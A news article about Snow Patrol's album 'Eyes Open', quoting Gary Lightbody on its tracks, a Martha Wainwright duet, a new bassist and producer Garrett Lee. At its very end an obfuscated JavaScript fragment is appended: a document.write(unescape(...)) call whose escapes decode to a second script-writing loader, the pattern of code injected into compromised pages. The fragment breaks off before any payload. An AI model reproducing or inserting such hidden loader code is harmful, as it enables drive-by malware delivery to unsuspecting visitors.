Snow Patrol's fourth album 'Eyes Open' is set to be released in April.
According to frontman Gary Lightbody, the follow up to 2004's 'Final Straw' will be a "bigger and bolder" version of their breakthrough album.
"There were a hell of a lot of chinks in 'Final Straw'," he told NME.COM. "We didn't have a lot of time to do that album and this is why we took longer. We've been able to experiment and elaborate more than we have done before.
"The sound of it is much bigger when it's meant to be bigger, as fragile as eggshells when it's meant to be, too. The contract's a lot bigger this time."
Track set to be included are 'Chasing Cars', 'Open Your Eyes', 'Shut Your Eyes', 'Make This Go On Forever' and 'You Could Be Happy' . The first single is likely to be 'You're All I Have'.
'Make Go This Go On Forever' and 'You Could Be Happy' use a choir of friends and members of other bands. 'Set The Fire To The Third Bar' sees Lightbody duetting with Martha Wainwright.
He said: "We're all huge fans of hers. There's a kind of ghostly quality to the track, it's quite dark, but it's sweet as well, if that's possible. Her piano overlaps mine, and her vocal overlaps mine, it's two people saying the same thing, feeling the same, in different places."
The albums lyrics are as confessional as ever. He continued: "It's still very personal stuff, I don't really know how to write about anything else. It's all very honest, and more than likely I don't come out it very well, but it's hopefully a broader stroke."
The album is also the first to feature new bass player Paul Wilson following the departure of Mark McClelland, and is produced by Garett Lee.
"[He's] just the fucking king of everything," Lightbody said. "I don't know what we'd do without him. The man is a god. He's one the very few people that I've ever met who has a map of the song before it starts. Our attention span isn't what it could be and Garrett can crack the whip as well."document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
